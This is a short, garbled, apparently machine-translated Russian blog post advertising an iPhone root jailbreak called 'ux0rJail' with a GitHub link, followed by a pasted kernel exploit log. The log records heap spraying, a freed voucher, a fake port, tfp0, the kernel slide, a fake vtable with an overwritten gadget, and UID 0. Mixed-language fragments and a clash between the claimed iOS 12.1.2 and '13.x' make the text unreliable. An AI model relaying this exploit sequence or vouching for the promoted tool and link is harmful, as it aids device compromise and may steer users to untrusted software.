Вернись! иПхоне 12.1.2 : Успешно Укоренился Показать корень файла: https://github.com/ux0rdev/ux0rJail 13.x : В обход Аппле Файловая система охрана ешение проблемы с ожиданием паники в ядре ... Файл журнала: D platform: iPhone8,1 16C101 + created 1024 pipes + created 8000 ports + sprayed 16646144 bytes to 1016 pipes in kalloc.16384 + created 3564 vouchers + sprayed 315752448 bytes to 8 ports in kalloc.1024 + stashed voucher pointer in thread ........................................................................................................................................................................... + sprayed 357924864 bytes of OOL ports to 4 ports in kalloc.32768 + recovered voucher port 0x2e8207 for freed voucher + adding references to the freed voucher to change the OOL port pointer + receiving the OOL ports will leak port 0x1ec003 + received voucher port 0x2e8207 in OOL ports + voucher overlapped at offset 0x7ca0 + received fake port 0x971b + port is at pipe index 169 + got ip_requests at 0xffffffe0066c60a0 + fake port is at offset 12600 + base port is at 0xffffffe006a07138 + kernel_task is at 0xffffffe00050d680 + done! port 0x971b is tfp0 Noncereboot Baslatiliyor... D found kernel slide 0x0000000002800000 slide: 0x0000000002800000 got user client: 0x980f Found port: 0xffffffe006a051b8 Found addr: 0xffffffe005f0ed40 Found vtab: 0xfffffff009665da8 Created fake_vtable at ffffffe0000c8000 Copied some of the vtable over Created fake_client at ffffffe0000cc000 Copied the user client over Wrote the `add x0, x0, #0x40; ret;` gadget over getExternalTrapForIndexour proc is at 0xffffffe00693e7b0 kern proc is at 0xfffffff009e6c988 D UID: 0

Теги других блогов: безопасность iPhone укоренение